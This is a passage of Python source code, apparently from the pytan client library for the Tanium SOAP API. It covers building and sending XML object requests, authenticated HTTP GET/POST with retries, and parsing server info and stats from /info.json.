* found objects
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def save(self, obj, **kwargs):
"""Create and send a UpdateObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to save
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* saved object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_update_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def add(self, obj, **kwargs):
"""Create and send a AddObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to add
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* added object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_add_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def delete(self, obj, **kwargs):
"""Create and send a DeleteObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to delete
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* deleted object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_delete_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def run_plugin(self, obj, **kwargs):
"""Create and send a RunPlugin XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to run
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* results from running object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_run_plugin_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def get_result_info(self, obj, **kwargs):
"""Create and send a GetResultInfo XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to get result info for
Returns
-------
obj : :class:`taniumpy.object_types.result_info.ResultInfo`
* ResultInfo for `obj`
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_info_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
# parse the ResultXML node into it's own element
resultxml_text = self._extract_resultxml(response_body=response_body)
cdata_el = ET.fromstring(resultxml_text)
obj = taniumpy.ResultInfo.fromSOAPElement(cdata_el)
obj._RAW_XML = resultxml_text
return obj
def get_result_data(self, obj, **kwargs):
"""Create and send a GetResultData XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to get result set for
Returns
-------
obj : :class:`taniumpy.object_types.result_set.ResultSet`
* otherwise, `obj` will be the ResultSet for `obj`
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_data_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
# parse the ResultXML node into it's own element
resultxml_text = self._extract_resultxml(response_body=response_body)
cdata_el = ET.fromstring(resultxml_text)
obj = taniumpy.ResultSet.fromSOAPElement(cdata_el)
obj._RAW_XML = resultxml_text
return obj
def get_result_data_sse(self, obj, **kwargs):
"""Create and send a GetResultData XML Request body that starts a server side export from `obj` and parses the response for an export_id.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to start server side export
Returns
-------
export_id : str
* value of export_id element found in response
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_data_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
# if there is an export_id node, return the contents of that
export_id = self._regex_body_for_element(
body=response_body, element='export_id', fail=True,
)
return export_id
def get_server_info(self, port=None, fallback_port=444, **kwargs):
"""Get the /info.json.
Parameters
----------
port : int, optional
* default: None
* port to attempt getting /info.json from, if not specified will use self.port
fallback_port : int, optional
* default: 444
* fallback port to attempt getting /info.json from if `port` fails
Returns
-------
info_dict : dict
* raw json response converted into python dict
* 'diags_flat': info.json flattened out into an easier to use structure for python handling
* 'server_info_pass_msgs': messages about successfully retrieving info.json
* 'server_info_fail_msgs': messages about failing to retrieve info.json
See Also
--------
:func:`pytan.sessions.Session._flatten_server_info` : method to flatten the dictionary received from info.json into a python friendly format
Notes
-----
* 6.2 /info.json is only available on soap port (default port: 444)
* 6.5 /info.json is only available on server port (default port: 443)
"""
self._check_auth()
url = self.INFO_RES
if port is None:
port = self.port
req_args = {}
req_args['port'] = port
req_args['url'] = url
req_args['retry_count'] = 0
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.INFO_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.INFO_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
info_body = ''
server_info_pass_msgs = []
server_info_fail_msgs = []
ok_m = "Successfully retrieved server info from {}:{}/{}".format
bad_m = "Failed to retrieve server info from {}:{}/{}, {}".format
json_fail_m = "Failed to parse server info from json, error: {}".format
diags_flat_fail_m = "Failed to flatten server info from json, error: {}".format
try:
info_body = self.http_get(**req_args)
server_info_pass_msgs.append(ok_m(self.host, port, self.INFO_RES))
except Exception as e:
self.mylog.debug(bad_m(self.host, port, self.INFO_RES, e))
server_info_fail_msgs.append(bad_m(self.host, port, self.INFO_RES, e))
if not info_body:
req_args['port'] = fallback_port
try:
info_body = self.http_post(**req_args)
server_info_pass_msgs.append(ok_m(self.host, port, self.INFO_RES))
except Exception as e:
self.mylog.debug(bad_m(self.host, port, self.INFO_RES, e))
server_info_fail_msgs.append(bad_m(self.host, port, self.INFO_RES, e))
try:
info_dict = json.loads(info_body)
except Exception as e:
info_dict = {'info_body_failed_json': info_body}
server_info_fail_msgs.append(json_fail_m(e))
try:
diagnostics = info_dict.get('Diagnostics', [])
info_dict['diags_flat'] = self._flatten_server_info(structure=diagnostics)
except Exception as e:
info_dict['diags_flat'] = {}
server_info_fail_msgs.append(diags_flat_fail_m(e))
info_dict['server_info_pass_msgs'] = server_info_pass_msgs
info_dict['server_info_fail_msgs'] = server_info_fail_msgs
return info_dict
def get_server_version(self, **kwargs):
"""Try to parse the server version from /info.json.
Returns
-------
str
* str containing server version from /info.json
"""
if not self._invalid_server_version():
return self.server_version
h = "Get the server version via /info.json"
pytan_help = kwargs.get('pytan_help', h)
kwargs['pytan_help'] = pytan_help
server_version = "Unable to determine"
if not getattr(self, 'server_info', {}):
self.server_info = self.get_server_info(**kwargs)
if not getattr(self, 'server_info', {}):
return server_version
version = None
try:
version = self.server_info['diags_flat']['Settings']['Version']
except Exception:
m = "Unable to find Version key in Settings: {}".format
self.mylog.debug(m(self.server_info['diags_flat']))
if version:
server_version = version
else:
m = "Unable to find Version key in Settings: {}".format
self.mylog.debug(m(self.server_info['diags_flat']))
if server_version:
self.server_version = str(server_version)
return server_version
def get_server_stats(self, **kwargs):
"""Create a str containing a number of stats gathered from /info.json.
Returns
-------
str
* str containing stats from /info.json
See Also
--------
:data:`pytan.sessions.Session.STATS_LOOP_TARGETS` : list of dict containing stat keys to pull from /info.json
"""
try:
self._check_auth()
except Exception:
return "Not yet authenticated!"
si = self.get_server_info(**kwargs)
try:
diags = si['diags_flat']
except Exception:
pass
stats_resolved = [
self._find_stat_target(target=t, diags=diags) for t in self.STATS_LOOP_TARGETS
]
stats_text = ", ".join(["{}: {}".format(*list(i.items())[0]) for i in stats_resolved])
return stats_text
def enable_stats_loop(self, sleep=None):
"""Enable the stats loop thread, which will print out the results of :func:`pytan.sessions.Session.get_server_stats` every :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC`.
Parameters
----------
sleep : int, optional
* when enabling the stats loop, update :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC` with `sleep`
See Also
--------
:func:`pytan.sessions.Session._stats_loop` : method started as a thread which checks self.STATS_LOOP_ENABLED before running :func:`pytan.sessions.Session.get_server_stats`
"""
self.STATS_LOOP_ENABLED = True
if isinstance(sleep, int):
self.STATS_LOOP_SLEEP_SEC = sleep
def disable_stats_loop(self, sleep=None):
"""Disable the stats loop thread, which will print out the results of :func:`pytan.sessions.Session.get_server_stats` every :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC`.
Parameters
----------
sleep : int, optional
* when disabling the stats loop, update :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC` with `sleep`
See Also
--------
:func:`pytan.sessions.Session._stats_loop` : method started as a thread which checks self.STATS_LOOP_ENABLED before running :func:`pytan.sessions.Session.get_server_stats`
"""
self.STATS_LOOP_ENABLED = False
if isinstance(sleep, int):
self.STATS_LOOP_SLEEP_SEC = sleep
def http_get(self, url, **kwargs):
"""An authenticated HTTP GET method. It will always forcibly use the authentication credentials that are stored in the current object when performing an HTTP GET.
Parameters
----------
url : str
* url to fetch on the server
host : str, optional
* default: self.host
* host to connect to
port : int, optional
* default: self.port
* port to connect to
headers : dict, optional
* default: {}
* headers to supply as part of GET request
connect_timeout : int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout : int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
debug : bool, optional
* default: self.HTTP_DEBUG
* False: do not print requests debug messages
* True: print requests debug messages
auth_retry : bool, optional
* default: self.HTTP_AUTH_RETRY
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count : int, optional
* default: self.HTTP_RETRY_COUNT
* number of times to retry the GET request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session._http_get` : private method used to perform the actual HTTP GET
"""
self._check_auth()
headers = kwargs.get('headers', {})
headers = self._replace_auth(headers=headers)
req_args = {}
req_args['host'] = kwargs.get('server', self.host)
req_args['port'] = kwargs.get('port', self.port)
req_args['url'] = url
req_args['headers'] = headers
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['debug'] = kwargs.get('debug', self.HTTP_DEBUG)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
auth_retry = kwargs.get('auth_retry', self.HTTP_AUTH_RETRY)
retry_count = kwargs.get('retry_count', self.HTTP_RETRY_COUNT)
if not retry_count or type(retry_count) != int:
retry_count = 0
current_try = 1
while True:
try:
body = self._http_get(**req_args)
break
except pytan.exceptions.AuthorizationError:
if self._session_id and auth_retry:
self._session_id = ''
self.authenticate(**kwargs)
body = self.http_get(auth_retry=False, **kwargs)
else:
raise
except Exception as e:
if retry_count == 0:
raise
m = "http_get failed on attempt {} out of {}: {}".format
self.mylog.debug(m(current_try, retry_count, e))
if current_try == retry_count:
self.mylog.warning(m(current_try, retry_count, e))
raise
current_try += 1
return body
def http_post(self, **kwargs):
"""An authenticated HTTP POST method. It will always forcibly use the authentication credentials that are stored in the current object when performing an HTTP POST.
Parameters
----------
url : str, optional
* default: self.SOAP_RES
* url to fetch on the server
host : str, optional
* default: self.host
* host to connect to
port : int, optional
* default: self.port
* port to connect to
headers : dict, optional
* default: {}
* headers to supply as part of POST request
body : str, optional
* default: ''
* body to send as part of the POST request
connect_timeout : int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout : int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
debug : bool, optional
* default: self.HTTP_DEBUG
* False: do not print requests debug messages
* True: print requests debug messages
auth_retry : bool, optional
* default: self.HTTP_AUTH_RETRY
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count : int, optional
* default: self.HTTP_RETRY_COUNT
* number of times to retry the POST request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session._http_post` : private method used to perform the actual HTTP POST
"""
self._check_auth()
headers = kwargs.get('headers', {})
headers = self._replace_auth(headers=headers)
req_args = {}
req_args['host'] = kwargs.get('server', self.host)
req_args['port'] = kwargs.get('port', self.port)
req_args['url'] = kwargs.get('url', self.SOAP_RES)
req_args['headers'] = headers
req_args['body'] = kwargs.get('body', None)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['debug'] = kwargs.get('debug', self.HTTP_DEBUG)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
auth_retry = kwargs.get('auth_retry', self.HTTP_AUTH_RETRY)
retry_count = kwargs.get('retry_count', self.HTTP_RETRY_COUNT)
if not retry_count or type(retry_count) != int:
retry_count = 0
current_try = 1
while True:
try:
body = self._http_post(**req_args)
break
except pytan.exceptions.AuthorizationError:
if self._session_id and auth_retry:
self._session_id = ''
self.authenticate()
body = self.http_post(auth_retry=False, **kwargs)
else:
raise
except Exception as e:
if retry_count == 0:
raise
m = "http_post failed on attempt {} out of {}: {}".format
self.mylog.debug(m(current_try, retry_count, e))
if current_try == retry_count:
self.mylog.warning(m(current_try, retry_count, e))
raise
current_try += 1
return body
def _http_get(self, host, port, url, headers=None, connect_timeout=15,
response_timeout=180, debug=False, pytan_help='', **kwargs):
"""An HTTP GET method that utilizes the :mod:`requests` package.
Parameters
----------
host : str
* host to connect to
port : int
* port to connect to
url : str
* url to fetch on the server
headers : dict, optional
* default: None
* headers to supply as part of POST request
connect_timeout : int, optional
* default: 15
* timeout in seconds for connection to host
response_timeout : int, optional
* default: 180
* timeout in seconds for response from host
debug : bool, optional
* default: False
* False: do not print requests debug messages
* True: print requests debug messages
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
perform_xml_clean : bool, optional
* default: False
* False: Do not run the response_body through an XML cleaner
* True: Run the response_body through an XML cleaner before returning it
clean_restricted : bool, optional
* default: True
* True: When XML cleaning the response_body, remove restricted characters as well as invalid characters
* False: When XML cleaning the response_body, remove only invalid characters
log_clean_messages : bool, optional
* default: True
* True: When XML cleaning the response_body, enable logging messages about invalid/restricted matches
* False: When XML cleaning the response_body, disable logging messages about invalid/restricted matches
log_bad_characters : bool, optional
* default: False
* False: When XML cleaning the response_body, disable logging messages about the actual characters that were invalid/restricted
* True: When XML cleaning the response_body, enable logging messages about the actual characters that were invalid/restricted
Returns
-------
body : str
* str containing body of response from server
"""
full_url = self._full_url(host=host, port=port, url=url)
cleaned_headers = self._clean_headers(headers=headers)
self.httplog.debug("HTTP request: GET to {}".format(full_url))
self.httplog.debug("HTTP request: headers: {}".format(cleaned_headers))
req_args = {}
req_args['headers'] = headers
req_args['timeout'] = (connect_timeout, response_timeout)
try:
response = self.REQUESTS_SESSION.get(full_url, **req_args)
response.pytan_help = pytan_help
except Exception as e:
m = "HTTP response: GET request to {!r} failed: {}".format
raise pytan.exceptions.HttpError(m(full_url, e))
self.LAST_REQUESTS_RESPONSE = response
if self.RECORD_ALL_REQUESTS:
self.ALL_REQUESTS_RESPONSES.append(response)
response_body = response.text
response_headers = response.headers
perform_xml_clean = kwargs.get('perform_xml_clean', False)
if perform_xml_clean:
xml_clean_args = {}
xml_clean_args['s'] = response_body
xml_clean_args['clean_restricted'] = kwargs.get('clean_restricted', True)
xml_clean_args['log_clean_messages'] = kwargs.get('log_clean_messages', True)
xml_clean_args['log_bad_characters'] = kwargs.get('log_bad_characters', False)
response_body = xml_cleaner(**xml_clean_args)
m = "HTTP response: from {!r} len:{}, status:{} {}, body type: {}".format
self.httplog.debug(m(
full_url,
len(response_body),
response.status_code,
response.reason,
type(response_body),
))
self.httplog.debug("HTTP response: headers: {}".format(response_headers))
if response.status_code in self.AUTH_FAIL_CODES:
m = "HTTP response: GET request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.AuthorizationError(m(
full_url, response.status_code, response_body))
if not response.ok:
m = "HTTP response: GET request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.HttpError(m(full_url, response.status_code, response_body))
self.bodyhttplog.debug("HTTP response: body:\n{}".format(response_body))
return response_body
def _http_post(self, host, port, url, body=None, headers=None, connect_timeout=15,
response_timeout=180, debug=False, pytan_help='', **kwargs):
"""An HTTP POST method that utilizes the :mod:`requests` package.
Parameters
----------
host : str
* host to connect to
port : int
* port to connect to
url : str
* url to fetch on the server
body : str, optional
* default: None
* body to send as part of the POST request
headers : dict, optional
* default: None
* headers to supply as part of POST request
connect_timeout : int, optional
* default: 15
* timeout in seconds for connection to host
response_timeout : int, optional
* default: 180
* timeout in seconds for response from host
debug : bool, optional
* default: False
* False: do not print requests debug messages
* True: print requests debug messages
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
perform_xml_clean : bool, optional
* default: True
* True: Run the response_body through an XML cleaner before returning it
* False: Do not run the response_body through an XML cleaner
clean_restricted : bool, optional
* default: True
* True: When XML cleaning the response_body, remove restricted characters as well as invalid characters
* False: When XML cleaning the response_body, remove only invalid characters
log_clean_messages : bool, optional
* default: True
* True: When XML cleaning the response_body, enable logging messages about invalid/restricted matches
* False: When XML cleaning the response_body, disable logging messages about invalid/restricted matches
log_bad_characters : bool, optional
* default: False
* False: When XML cleaning the response_body, disable logging messages about the actual characters that were invalid/restricted
* True: When XML cleaning the response_body, enable logging messages about the actual characters that were invalid/restricted
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.xml_clean.xml_cleaner` : function to remove invalid/bad characters from XML responses
"""
full_url = self._full_url(host=host, port=port, url=url)
cleaned_headers = self._clean_headers(headers=headers)
self.httplog.debug("HTTP request: POST to {}".format(full_url))
self.httplog.debug("HTTP request: headers: {}".format(cleaned_headers))
if not body:
print_body = ''
else:
print_body = '\n{}'.format(body)
self.bodyhttplog.debug("HTTP request: body:{}".format(print_body))
req_args = {}
req_args['headers'] = headers
req_args['data'] = body
req_args['timeout'] = (connect_timeout, response_timeout)
try:
response = self.REQUESTS_SESSION.post(full_url, **req_args)
response.pytan_help = pytan_help
except Exception as e:
m = "HTTP response: POST request to {!r} failed: {}".format
raise pytan.exceptions.HttpError(m(full_url, e))
self.LAST_REQUESTS_RESPONSE = response
if self.RECORD_ALL_REQUESTS:
self.ALL_REQUESTS_RESPONSES.append(response)
response_body = response.text
response_headers = response.headers
perform_xml_clean = kwargs.get('perform_xml_clean', True)
if perform_xml_clean:
xml_clean_args = {}
xml_clean_args['s'] = response_body
xml_clean_args['clean_restricted'] = kwargs.get('clean_restricted', True)
xml_clean_args['log_clean_messages'] = kwargs.get('log_clean_messages', True)
xml_clean_args['log_bad_characters'] = kwargs.get('log_bad_characters', False)
response_body = xml_cleaner(**xml_clean_args)
m = "HTTP response: from {!r} len:{}, status:{} {}, body type: {}".format
self.httplog.debug(m(
full_url,
len(response_body),
response.status_code,
response.reason,
type(response_body),
))
self.httplog.debug("HTTP response: headers: {}".format(response_headers))
if response.status_code in self.AUTH_FAIL_CODES:
m = "HTTP response: POST request to {!r} returned code: {}, body: {}".format
m = m(full_url, response.status_code, response_body)
raise pytan.exceptions.AuthorizationError(m)
if not response_body:
m = "HTTP response: POST request to {!r} returned empty body".format
raise pytan.exceptions.HttpError(m(full_url))
if not response.ok:
m = "HTTP response: POST request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.HttpError(m(full_url, response.status_code, response_body))
self.bodyhttplog.debug("HTTP response: body:\n{}".format(response_body))
return response_body
def _replace_auth(self, headers):
"""Utility method for removing username, password, and/or session from supplied headers and replacing them with the current objects session or username and password.
Parameters
----------
headers : dict
* dict of key/value pairs for a set of headers for a given request
Returns
-------
headers : dict
* dict of key/value pairs for a set of headers for a given request
"""
for k in dict(headers):
if k in ['username', 'password', 'session']:
self.authlog.debug("Removing header {!r}".format(k))
headers.pop(k)
if self._session_id:
headers['session'] = self._session_id
self.authlog.debug("Using session ID for authentication headers")
elif self._username and self._password:
headers['username'] = b64encode(self._username.encode("utf-8"))
headers['password'] = b64encode(self._password.encode("utf-8"))
self.authlog.debug("Using Username/Password for authentication headers")
return headers
def _full_url(self, url, **kwargs):
"""Utility method for constructing a full url.
Parameters
----------
url : str
* url to use in string
host : str, optional
* default: self.host
* hostname/IP address to use in string
port : str, optional
* default: self.port
* port to use in string
Returns
-------
full_url : str
* full url in the form of https://$host:$port/$url
"""
host = kwargs.get('host', self.host)
port = kwargs.get('port', self.port)
full_url = "https://{0}:{1}/{2}".format(host, port, url)
return full_url
def _clean_headers(self, headers=None):
"""Utility method for getting the headers for the current request, combining them with the session headers used for every request, and obfuscating the value of any 'password' header.
Parameters
----------
headers : dict
* dict of key/value pairs for a set of headers for a given request
Returns
-------
headers : dict
* dict of key/value pairs for a set of cleaned headers for a given request
"""
clean_headers = dict(headers or {})
return_headers = {}
return_headers.update(self.REQUESTS_SESSION.headers)
return_headers.update(clean_headers)
if 'password' in return_headers:
return_headers['password'] = '**PASSWORD**'
return return_headers
def _start_stats_thread(self, **kwargs):
"""Utility method starting the :func:`pytan.sessions.Session._stats_loop` method in a threaded daemon."""
stats_thread = threading.Thread(target=self._stats_loop, args=(), kwargs=kwargs)
stats_thread.daemon = True
stats_thread.start()
def platform_is_6_5(self, **kwargs):
"""Check to see if self.server_version is less than 6.5.
Changed in 2.2.0 to assume platform IS 6.5 or greater.
Returns
-------
ret : bool
* True if self.force_server_version is greater than or equal to 6.5
* True if self.server_version is greater than or equal to 6.5
* False if self.server_version is less than 6.5
"""
ret = True
if self.force_server_version:
ret = False if not self.force_server_version >= '6.5' else ret
else:
if self._invalid_server_version():
# server version is not valid, force a refresh right now
self.get_server_version(**kwargs)
if not self._invalid_server_version():
ret = False if not self.server_version >= '6.5' else ret
return ret
def _stats_loop(self, **kwargs):
"""Utility method for logging server stats via :func:`pytan.sessions.Session.get_server_stats` every self.STATS_LOOP_SLEEP_SEC."""
while True:
if self.STATS_LOOP_ENABLED:
server_stats = self.get_server_stats(**kwargs)
self.statslog.warning(server_stats)
time.sleep(self.STATS_LOOP_SLEEP_SEC)
def _flatten_server_info(self, structure):
"""Utility method for flattening the JSON structure for info.json into a more python usable format.
Parameters
----------
structure
* dict/tuple/list to flatten
Returns
-------
flattened
* the dict/tuple/list flattened out
"""
flattened = structure
if isinstance(structure, dict):
for k, v in flattened.items():
flattened[k] = self._flatten_server_info(structure=v)
elif isinstance(structure, (tuple, list)):
if all([isinstance(x, dict) for x in structure]):
flattened = {}
[flattened.update(self._flatten_server_info(structure=i)) for i in structure]
return flattened
def _get_percentage(self, part, whole):
"""Utility method for getting percentage of part out of whole.
Parameters
----------
part: int, float
whole: int, float
Returns
-------
str : the percentage of part out of whole in 2 decimal places
"""
f = 100 * float(part) / float(whole)
return "{0:.2f}%".format(f)
def _find_stat_target(self, target, diags):
"""Utility method for finding a target in info.json and returning the value, optionally performing a percentage calculation on two values if the target[0] starts with percentage(.
Parameters
----------
target : list
* index0 : label : human friendly name to refer to search_path
* index1 : search_path : / seperated search path to find a given value from info.json
diags : dict
* flattened dictionary of info.json diagnostics
Returns
-------
dict
* label : same as provided in `target` index0 (label)
* result : value resolved from :func:`pytan.sessions.Session._resolve_stat_target` for `target` index1 (search_path)
"""
try:
label, search_path = list(target.items())[0]
except Exception as e:
label = "Parse Failure"
result = "Unable to parse stat target: {}, exception: {}".format(target, e)
return {label: result}
if search_path.startswith('percentage('):
points = search_path.lstrip('percentage(').rstrip(')')
points = [
self._resolve_stat_target(search_path=p, diags=diags) for p in points.split(',')
]
try:
result = self._get_percentage(part=points[0], whole=points[1])
except Exception:
result = ', '.join(points)
else:
result = self._resolve_stat_target(search_path=search_path, diags=diags)
return {label: result}
def _resolve_stat_target(self, search_path, diags):
"""Utility method for resolving the value of search_path in info.json and returning the value.
Parameters
----------
search_path : str
* / seperated search path to find a given value from info.json
diags : dict
* flattened dictionary of info.json diagnostics
Returns
-------
str
* value resolved from `diags` for `search_path`
"""
try:
for i in search_path.split('/'):
diags = diags.get(i)
except Exception as e:
return "Unable to find diagnostic: {}, exception: {}".format(search_path, e)
return diags
def _build_body(self, command, object_list, log_options=False, **kwargs):
"""Utility method for building an XML Request Body.
Parameters
----------
command : str
* text to use in command node when building template
object_list : str
* XML string to use in object list node when building template
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
log_options : bool, optional
* default: False
* False: Do not print messages setting attributes in Options from keys in kwargs
* True: Print messages setting attributes in Options from keys in kwargs
Returns
-------
body : str
* The XML request body created from the string.template self.REQUEST_BODY_TEMPLATE
"""
options_obj = taniumpy.Options()
for k, v in kwargs.items():
if hasattr(options_obj, k):
if log_options:
m = "Setting Options attribute {!r} to value {!r}".format
self.mylog.debug(m(k, v))
setattr(options_obj, k, v)
else:
if log_options:
m = "Ignoring argument {!r} for options list, not a valid attribute".format
self.mylog.debug(m(k))
options = options_obj.toSOAPBody(minimal=True)
body_template = string.Template(self.REQUEST_BODY_BASE)
body = body_template.substitute(command=command, object_list=object_list, options=options)
return body
def _create_run_plugin_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to run a plugin.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'RunPlugin'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_add_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to add an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'AddObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_delete_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to delete an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'DeleteObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_result_info_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get result info for an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'GetResultInfo'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_result_data_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get result data for an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the servers response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'GetResultData'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get an object.
Parameters
----------
